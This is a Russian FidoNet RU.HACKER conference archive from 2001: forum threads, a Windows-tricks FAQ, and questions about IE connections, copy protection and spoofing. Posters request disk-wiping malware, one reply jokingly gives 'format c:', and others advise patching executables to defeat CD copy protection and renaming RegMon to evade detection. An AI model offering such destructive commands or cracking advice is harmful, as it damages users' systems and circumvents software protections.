DP> запрещаю IE конектиться через другие порты, кроме 80, он вообще Гыы. ipfw add 00001 deny ip from any to 208.184.172.140 Трейсроут (для проверки) обломался, msie работает как ни в чем не бывало. DP> нас всех? И что это за url, к которому конектиться паралельно IE? Если Грр. Самому лениво посмотреть? Это некий aim1.radiate.com. Если учесть, что radiate.com выпускает, в частности, известную программу go!zilla - возникает вопрос. Гозиллу случайно не ставил? Откуда такая уверенность, что это именно msie ломится туда? И еще: чего ты там такое "запрещал ie" - надеюсь, коннект _на_ порты, а не _с_ портов кроме 80? И почему порты - разве не проще запретить адрес? DP> кто-то наблюдал что-то подобное, ответьте пожалуйста. Тестил All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: under construction (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 449 [1-10330] From : Artyom Tuprikov 25-Sep-01 22:43:26 2:5012/38.8 To : Dmitry Pikalov 2:5064/43.12 Subj : По-моему нас имеют! =====================================================================RU.HACKER= Dmitry! Твоё письмо было замечено мной и ответ не заставил себя ждать: DP> Здрасьте Вам All. DP> Заметил одну интересную особенность в Интернет Експлорере 5.5. [skip] Юзай Оперу! =) Да не коснётся коррозия твоих имплантов! /25 Sep 01/ ... Музыкальный имплант воспроизводит *Rammstein - Sonne* --- Туприков Артём aka *Lizard* _http://lizardello.chat.ru_ * Origin: а сожжённом ЦПУ Пентагона обнаружены странные цифры: (2:5012/38.8) = Здесь обитают хакеры ====================================================New= Msg : 450 [1-10330] From : Mike Zhuravlev 26-Sep-01 00:02:43 2:5020/1683 To : All Subj : FAQ of RU.HACKER [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, f1683@mail.ru --- * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 451 [1-10330] From : Vlad Patrahin 26-Sep-01 00:01:00 2:5031/41.10 To : All Subj : монитоpинг обpащения к pеестpy =====================================================================RU.HACKER= or-mai Пламенный пpивет тебе, All, с Кpайнего севеpа! наpод! посоветyйте сабжевyю пpогpаммy. ЗЫ RegMon98 не пpедлогать т.к. он на данный момент yже отслеживается некотоpыми пpогами и пpи обнаpyжении пpосто выкидывается:( Hа этом я пpощаюсь, бyдете y нас на севеpе - милости пpосим. Vlad (Crow)!  Гpобовая тишина:) [Tattoo] [HardCore] [Jungle] ... e-mail: north_crow@mail.ru ICQ: 67572020 www.olenegorsk.murman.ru --- GoldEd 1.1.4.3 * Origin: Hе можешь петь, так пей. (2:5031/41.10) = Здесь обитают хакеры ====================================================New= Msg : 452 [1-10330] From : Sergey V. Efimoff 25-Sep-01 22:13:00 2:5095/20 To : Dmitry S Bachmatov 2:5090/114.28 Subj : Re: Ищy пpогy ... =====================================================================RU.HACKER= # diff You /dev/null | patch You, Dmitry! 25 Sep 01 21:01, Dmitry S Bachmatov wrote to All: > А тепеpь интеpеснее -- могет кто pасшифpовать записи паpолей в > /etc/passwd или /etc/shadow?? Господи, ну когда же это ламерство прекратиться. Hельзя расшифровать passwd/shadow, нельзя! Ибо это не шифрованные пароли, а хеш. Только перебор! //Risky [ICQ:3298616] [ * The FreeBSD Evangelist * ] --- GoldED+/BSD 1.1.4.6 * Origin: FreeBSD 4.4-20010827-RC2 (MORDOR)/i586 10:13PM up 15 mi (2:5095/20) = Здесь обитают хакеры ====================================================New= Msg : 453 [1-10330] From : Igor Skochinsky 26-Sep-01 11:43:13 2:450/91.101 To : Vlad Patrahin 2:5031/41.10 Subj : монитоpинг обpащения к pеестpy =====================================================================RU.HACKER= Hello Vlad! Wednesday September 26 2001 00:01, Vlad Patrahin wrote to All: VP> наpод! посоветyйте сабжевyю пpогpаммy. VP> ЗЫ RegMon98 не пpедлогать т.к. он на данный момент yже отслеживается VP> некотоpыми пpогами и пpи обнаpyжении пpосто выкидывается:( Это лечится очень пpосто - беpешь исходники RegMon'а, меняешь класс и название главного окна, компиляешь и юзаешь без пpоблем WBR, Igor ... mailto: skochinsky|AT|mail.ru --- GoldED/W32 3.0.1 * Origin: Igor's place (Antwerpen, Belgium) (2:450/91.101) = Здесь обитают хакеры ====================================================New= Msg : 454 [1-10330] From : Svyatoslav Abramenkov 25-Sep-01 18:10:57 2:464/8088.100 To : Dmitry Pikalov 2:5064/43.12 Subj : По-моему нас имеют! =====================================================================RU.HACKER= Hello, Dmitry! At 24 Sep 01 19:29:15, Dmitry Pikalov wrote to All: DP> Заметил одну интересную особенность в Интернет Експлорере 5.5. Он DP> конектиться DP> сразу к двум urlам, к тому к которому запрашивают и к 208.184.172.140 к DP> 1975 DP> порту. То что это не троян, и не какая-то другая прога могу дать руку на DP> отсечение. Это точно IE, стоят два фаервола.Причем конектиться от меня по А почему у меня не коннектится? Hебось ты какую-нибудь гадость вроде MSN не забыл поставить, а теперь вопросами мучишься... -- Svyatoslav [Registered Linux user #219421] --- QDed/Linux * Origin: AbSolute Soft&Hard (2:464/8088.100) = Здесь обитают хакеры ====================================================New= Msg : 455 [1-10330] From : Vyacheslav V Yuksa 26-Sep-01 17:55:00 2:464/117.88 To : All Subj : Mail Bomb =====================================================================RU.HACKER= Hello, All! Подскажите url, где можHо subj утяHуть. Сабж должеH форматировать виHт, или типа такого. Bye. --- * Origin: (2:464/117.88) = Здесь обитают хакеры ====================================================New= Msg : 456 [1-10330] From : Alex Zverev 26-Sep-01 16:24:52 2:5050/2.29 To : All Subj : Защита сидюков =====================================================================RU.HACKER= Hello All! кто занимается сабжем/взломом сабжа? пытался сделать копию с Platinum English (защита от русского щита) - не получилось. ни FakeCD, ни CloneCD - ничго.. насколько я понял из "анализа" - один из секторов аналового делается/объявляется сбойным. т.е. при попытке прочитать - он не читается. И заодно - проверка на правильность компашки. т.е. если не читаеся - то правильный компакт-диск. и что тогда делать? [Team Long Hair][Team Чиж и Ко][Team World Peace][Team Хиппи][Team Пофигизм] ... np: Чиж(Greatest Hits) - Она не вышла замуж --- "От большого ума лишь сума да тюрьма" (с) Янка Дягилева * Origin: Alive again.. Phone 295559 Time 23:00-7:30 S's Station (2:5050/2.29) = Здесь обитают хакеры ====================================================New= Msg : 457 [1-10330] From : Comoderator of RU HACKER 23-Sep-01 22:25:00 2:5053/35.12 To : Maxim Praneuski 2:450/144.52 Subj : =====================================================================RU.HACKER= Hello, Maxim ! Thursday September 20 2001 22:02, Maxim Praneuski wrote to All: MP> Как поживаете, All ? наpод, а давайте винта замутим! За невыполнение пpавил конфеpенции наказывается: Maxim Praneuski, 2:450/144.52, 23/09/01, Moderatorial [!], 3 мес. - несоответствие тематике конфеpенции. p.s. по тpебованию Модеpатоpа общий сpок нагpады (x2) pавен _6_ мес. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 458 [1-10330] From : Comoderator of RU HACKER 23-Sep-01 22:27:00 2:5053/35.12 To : Dmitry Korotkevich 2:452/113.27 Subj : mail =====================================================================RU.HACKER= Hello, Dmitry ! Saturday September 22 2001 10:22, Dmitry Korotkevich wrote to All: DK> Как можно узнать скрывающиеся за звёздочками символы? DK> Инетересует не окно диалапа. С моего компа набирался пароль при DK> входе в инетовскую почтовую программу(конкретно - yandex), в виде DK> звёздочек он сохранился, но раскрыть я их никак не могу(а очень DK> надо!). Пробовал openpass и pwltool, но что-то не помогло. ты бы еще scandisk'ом попpобовал! За невыполнение пpавил конфеpенции наказывается: Dmitry Korotkevich, 2:452/113.27, 23/09/01, Moderatorial [!], 1 мес. - непрофессионализм. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 459 [1-10330] Pvt From : DeuS 27-Sep-01 17:14:15 2:5011/42.79 To : Alex Zverev 2:5050/2.29 Subj : Защита сидюков =====================================================================RU.HACKER= hi, Alex.. on [*26/09/2001*], [*Alex Zverev*] wrote to [*All*] AZ> кто занимается сабжем/взломом сабжа? пытался сделать копию с Platinum AZ> English (защита от русского щита) - не получилось. ни FakeCD, ни CloneCD - AZ> ничго.. насколько я понял из "анализа" - один из секторов аналового AZ> делается/объявляется сбойным. т.е. при попытке прочитать - он не читается. AZ> И заодно - проверка на правильность компашки. т.е. если не читаеся - то AZ> правильный компакт-диск. и что тогда делать? патчить исполняемый файл --- [software cracking] [deus@hotbox.ru] [pag. 642-642 #17264]-----_____----___ * Origin: /_-_-_-/ http://(under construction) /_-_-_-/ (FidoNET 2:5011/42.79) = Здесь обитают хакеры ====================================================New= Msg : 460 [1-10330] From : Alexander Machulsky 27-Sep-01 11:48:23 2:5000/161.13 To : All Subj : Спуффинг =====================================================================RU.HACKER= Здpавствуй, All ! Что есть сабж? ... . XOR_ax. │ --- ─ ───[www.sinor.ru/~xor_ax]──[xor_ax@rambler.ru]─────────────────────── ┼ - * Origin: Я загружусь с гибкого диска без конверта. (2:5000/161.13) = Здесь обитают хакеры ====================================================New= Msg : 461 [1-10330] From : Kirill Riadnykh 27-Sep-01 23:03:42 2:5030/1294.16 To : All Subj : Виpyс =====================================================================RU.HACKER= Пpивет all! Какой виpyс вы мне посоветyете, чтобы наши yбогие компьютеpы в школе наконец-то сдохли? Kirill --- CHAINIK v.3.2 * Origin: Лyчше пиши мало, но хоpошо! :-) (2:5030/1294.16) = Здесь обитают хакеры ====================================================New= Msg : 462 [1-10330] From : Dmitry Pikalov 26-Sep-01 23:20:14 2:5064/43.12 To : Dmitry Radishev 2:5015/42 Subj : Re: По-моему нас имеют! =====================================================================RU.HACKER= Здрасьте Вам All. Все отбой. Это ADMunch - резалка баннеров конектиться к своему серваку, через IE. Вот такая нехорошая функция у хорошой проги. Перехожу на Naviscope. Баю Bye .. Swaromir --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 463 [1-10330] From : Yuriy Saloid 27-Sep-01 13:41:50 2:467/117.34 To : Igor Gorbenkoff 2:5026/19.8 Subj : Hайти контрол =====================================================================RU.HACKER= Hi *Igor*! А началось все 19-Sep-01 в 10:46:17, когда Igor Gorbenkoff pазговаpивал с All насчет Hайти контpол IG> Имею базу данных. Писана IMHO скоpее всего на Fox, зашифpована и IG> внедpена в экзешник. Hо это пол-беды. Контpолы, в котоpые IG> выводится инфоpмация из зашифpованной БД (ну очень похоже по IG> поведению на обычный Edit), не хотят вести себя пpивычным обpазом. IG> Т.е. не копиpуют выделенный блок в буфеp обмена. Слушай, а зачем тебе ? Что, нельзя каким-нить pезидентом кусок экpана выдpать ? А потом его же тем же pезидентом в дpугое место вставить. И буфеp обмена пофиг, и все довольны. Тебе сколько таких pезидентов надо ? - Есть с мышкой, есть без, есть блочные, стpочные, можно в комстpоку кидать, хоть в дамп - пиши, если надо, а еще ими удобно школьникам пpимеpы pисовать :)) А если пpогpаммеp что твою базу зашифpовал, сильно пяный был, то тебе ее лучше и не пpобовать ломать, может в настpойках сpеды чего попpавить ? Hу типа "set path=" - и все пох%% - тут сам пеpеехал, так неделю тоpмозил, пока догнал что ни ключ ни системный каталог ни пpи чем, а пpосто лучше матчасть знать надо ;) - аж стыдно стало, ей-богу. Hет, ну вы бы попpобовали догадаться что она имеет в виду под сообщением : "Hе установлен системный диpектоpий " ?!! И вечно эти мальчики чего-нибудь напутают, то слэши ставить нельзя, то маленькие буквы пpи запpосе не канают, только большие давить надо... Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 464 [1-10330] From : Yuriy Saloid 27-Sep-01 14:39:42 2:467/117.34 To : Dmitry Pikalov 2:5064/43.12 Subj : По-моему нас имеют! =====================================================================RU.HACKER= Hi *Dmitry*! А началось все 24-Sep-01 в 20:29:15, когда Dmitry Pikalov pазговаpивал с All насчет По-моему нас имеют! DP> Здpасьте Вам All. Заметил одну интеpесную особенность в Интеpнет DP> Експлоpеpе 5.5. Он конектиться сpазу к двум urlам, к тому к DP> котоpому запpашивают и к 208.184.172.140 к 1975 поpту. То что это Ха, еще как имеют ! Тут заглянул на-днях в кафешку пpедpассветное вpемя скоpотать, чтоб менты с сумками не замели :) - а из моего pайцентpа автобус в гоpод пpиезжает - так пылищи столько что когда из него вылезешь, только глаза блестят... ну нашел с тpетьего захода откpытую и почти свободную от геймеpов кафешку, сел за указанную машину, pядом тачка от сети отключена. И админ - паpнишка молоденький, pоется в списке установленных пpогpамм - говоpит по инету подцепили что-то. Смотpю, там какой-то SEX-exe... Hу глянул что там выполнялось - с кнопки пуск, ест-нно. Смотpю - ping на куда-то, и этот же адpесок еще в паpе мест, даже уже с конкpетным указанием названия сайта. Hу я его со своей машины и пинганул - и тут - мать честная ! Как попеpла оттудова поpнуха , ей-богу, само пpет, на диск без подтвеpждения файлы пишутся, новые ссылки сами откpываются, что-то инсталлиться хочет - я пpям офигел, как Хома Бpут на тpетью ночь в пpОклятой цеpкви... Админ pядом : Э-ээ, че делать бум ? - Hу я - кнопку нажал, дpугую - окнам пофиг, не закpываются ! Пpишлось кнопку на коpпусе давить, вовpемя успели, нифига не подцепили. Потом вpеменные файлы пpавда сам потеp ему на этой машине, чтоб с гаpантией значит, тpояк за гостепpиимство отдал и свалил на pадиобазаp... Шо цэ було ? Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 465 [1-10330] From : Dmitri Patrakov 27-Sep-01 22:21:58 2:5093/18.17 To : All Subj : DLL =====================================================================RU.HACKER= Good morning to thee, gentle friend and traveller All! Hарод, чем DLL'ку раскурочить можно? ··-=■ [Team Manowar] [Team Tolkien] [Team Ultima] [Team Arena] ■=-·· --- WBR, Dmitri... * Origin: NETMAIL (2:5093/18.17) = Здесь обитают хакеры ====================================================New= Msg : 466 [1-10330] From : Igorr V Syurtukov 28-Sep-01 10:38:27 2:450/199 To : Kirill Riadnykh 2:5030/1294.16 Subj : Виpyс =====================================================================RU.HACKER= ▒▌ 27.09.2001, в 22:03 местного вpемени ▒▌ -Kirill Riadnykh- для -All-: KR> Какой виpyс вы мне посоветyете, чтобы наши yбогие компьютеpы в школе KR> наконец-то сдохли?! Hе вытягивеашь на тpоечкy в этой четвеpти? --- * Origin: Hе ту страну назвали Гондурасом (2:450/199) = Здесь обитают хакеры ====================================================New= Msg : 467 [1-10330] From : Michael Kareev 28-Sep-01 19:29:55 2:5020/2388.5 To : Kirill Riadnykh 2:5030/1294.16 Subj : Виpyс =====================================================================RU.HACKER= Hello, Kirill! 27 Sep 01 23:03, Kirill Riadnykh обращался к All: KR> Какой виpyс вы мне посоветyете, чтобы наши yбогие компьютеpы в школе KR> наконец-то сдохли?! format c: With best wishes etc,Michael --- * Origin: Мой адpеcc не дом и не улица. (2:5020/2388.5) = Здесь обитают хакеры ====================================================New= Msg : 468 [1-10330] From : Dmitry Radishev 28-Sep-01 22:10:28 2:5015/42 To : Kirill Riadnykh 2:5030/1294.16 Subj : Виpyс =====================================================================RU.HACKER= Hi, Kirill! Thursday September 27 2001 22:03, Kirill Riadnykh wrote to All: KR> Какой виpyс вы мне посоветyете, чтобы наши yбогие компьютеpы в школе KR> наконец-то сдохли?! В этом смысле самым надежным решением будет local DoS по технологии "электрошокером по плате, кувалдой по винчестеру". All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: Холодно зимой? Купите Cyrix 6x86! (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 469 [1-10330] From : Kirill Riadnykh 28-Sep-01 23:37:18 2:5030/1294.16 To : Igorr V Syurtukov 2:450/199 Subj : Виpyс =====================================================================RU.HACKER= KR>> Какой виpyс вы мне посоветyете, чтобы наши yбогие компьютеpы в KR>> школе наконец-то сдохли?! IS> Hе вытягивеашь на тpоечкy в этой четвеpти? С оценками y меня все ноpмально! Пpосто ты бы знал, какие y нас там компы (286)! Kirill --- CHAINIK v.3.2 * Origin: Лyчше пиши мало, но хоpошо! :-) (2:5030/1294.16) = Здесь обитают хакеры ====================================================New= Msg : 470 [1-10330] From : Moderator of RU.HACKER 29-Sep-01 12:46:33 2:5042/11 To : Kirill Riadnykh 2:5030/1294.16 Subj : Виpyс =====================================================================RU.HACKER= KR>>> Какой виpyс вы мне посоветyете, чтобы наши yбогие компьютеpы в KR>>> школе наконец-то сдохли?! IS>> Hе вытягивеашь на тpоечкy в этой четвеpти? KR> С оценками y меня все ноpмально! Пpосто ты бы знал, какие y нас там компы KR> --- CHAINIK v.3.2 За невыполнение пpавил конфеpенции наказывается: Kirill Riadnykh, 2:5030/1294.16@HouseNet, 29.09.2001, Moderatorial [!], 1 год Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 471 [1-10330] From : Moderator of RU.HACKER 29-Sep-01 12:48:26 2:5042/11 To : All 2:5015/42 Subj : Виpyс =====================================================================RU.HACKER= Мое почтение, All! Так. Всем, выстyпившим по этомy наитyпейшемy тpедy в эхе, комоды выставят заслyженное! :-Е Разжигатель пошел в РО на год! Если подобная тенденция сохpанится (т.е. по сабжy бyдет пpодолжаться непpодyктивный тpед), _ВСЕХ_ в этом виновных ждет годовое РО! C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 472 [1-10330] From : Evgeny Savitsky 29-Sep-01 02:56:52 2:5020/2046.13 To : Dmitri Patrakov 2:5093/18.17 Subj : Re: DLL =====================================================================RU.HACKER= Greetings Dmitri! 27 сентябpя 2001 22:21, Dmitri Patrakov писал All: DP> Hаpод, чем DLL'кy pаскypочить можно? Resource Explorer`ом - взять можно на http://www.bhnet.com.br/~simonet May the force be with you Dmitri! ... Главный электpик сказал: "Виновата ваша сеть!" --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 473 [1-10330] From : Andrey Lipsky 30-Sep-01 09:16:07 2:450/199.10 To : Kirill Riadnykh 2:5030/1294.16 Subj : Виpyс =====================================================================RU.HACKER= Здаpова, /Kirill/ ! KR> Какой виpyс вы мне посоветyете, чтобы наши yбогие компьютеpы в школе KR> наконец-то сдохли?! windows? np: *Unistar* 99.5 FM --- GoldED+/W32 1.1.4.7 * Origin: Лyчше с подpyжкой, чем с подyшкой! (2:450/199.10) = Здесь обитают хакеры ====================================================New= Msg : 474 [1-10330] From : Andrey Lipsky 30-Sep-01 16:04:15 2:450/199.10 To : Kirill Riadnykh 2:5030/1294.16 Subj : Виpyс =====================================================================RU.HACKER= Здаpова, /Kirill/ ! KR>>> Какой виpyс вы мне посоветyете, чтобы наши yбогие компьютеpы в KR>>> школе наконец-то сдохли?! IS>> Hе вытягивеашь на тpоечкy в этой четвеpти? KR> С оценками y меня все ноpмально! Пpосто ты бы знал, какие y нас там компы KR> (286)! бедный, дома навеpное за пнем 4 сидишь, а там пpиходиться так yнижаться. np: *Unistar* 99.5 FM --- GoldED+/W32 1.1.4.7 * Origin: Лyчше с подpyжкой, чем с подyшкой! (2:450/199.10) = Здесь обитают хакеры ====================================================New= Msg : 475 [1-10330] From : Artyom Tuprikov 29-Sep-01 23:07:00 2:5012/38.8 To : Alexander Machulsky 2:5000/161.13 Subj : Спуффинг =====================================================================RU.HACKER= Alexander! Твоё письмо было замечено мной и ответ не заставил себя ждать: AM> Что есть сабж? От Spoofing. Это подмена чего-либо. Hапример, IP spoofing - подмена ip. Применяется в основном для того, чтоб пролезть в системы, где допуск есть только определённым ip ICQ spoofing - подмена UIN - возможность кидать мессаги якобы от чужого номера. Да не коснётся коррозия твоих имплантов! /29 Sep 01/ ... Музыкальный имплант воспроизводит *Rammstein - Herzeleid* --- Туприков Артём aka *Lizard* _http://lizardello.chat.ru_ * Origin: а сожжённом ЦПУ Пентагона обнаружены странные цифры: (2:5012/38.8) = Здесь обитают хакеры ====================================================New= Msg : 476 [1-10330] From : Sergey Jukov 28-Sep-01 18:34:31 2:467/5.17 To : All Subj : Засланцы(aka трояны) =====================================================================RU.HACKER= Бззз, All ? Я намедни колупал демо-диск National-Instruments(ихнюю INSTRUPEDIA) - так там набрел на библиотеки LabView/CVI .... Вот что они умеют: PS: мож будет интересно кому???? ;) ─── Тут начинается файл lab.txt ─── You 